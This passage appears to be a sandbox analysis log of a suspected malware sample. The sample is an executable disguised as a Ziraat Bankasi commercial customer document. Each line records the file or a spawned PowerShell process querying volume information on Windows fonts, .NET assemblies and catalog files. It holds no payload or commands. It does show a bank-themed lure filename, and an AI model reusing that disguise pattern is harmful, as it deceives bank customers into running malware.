          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
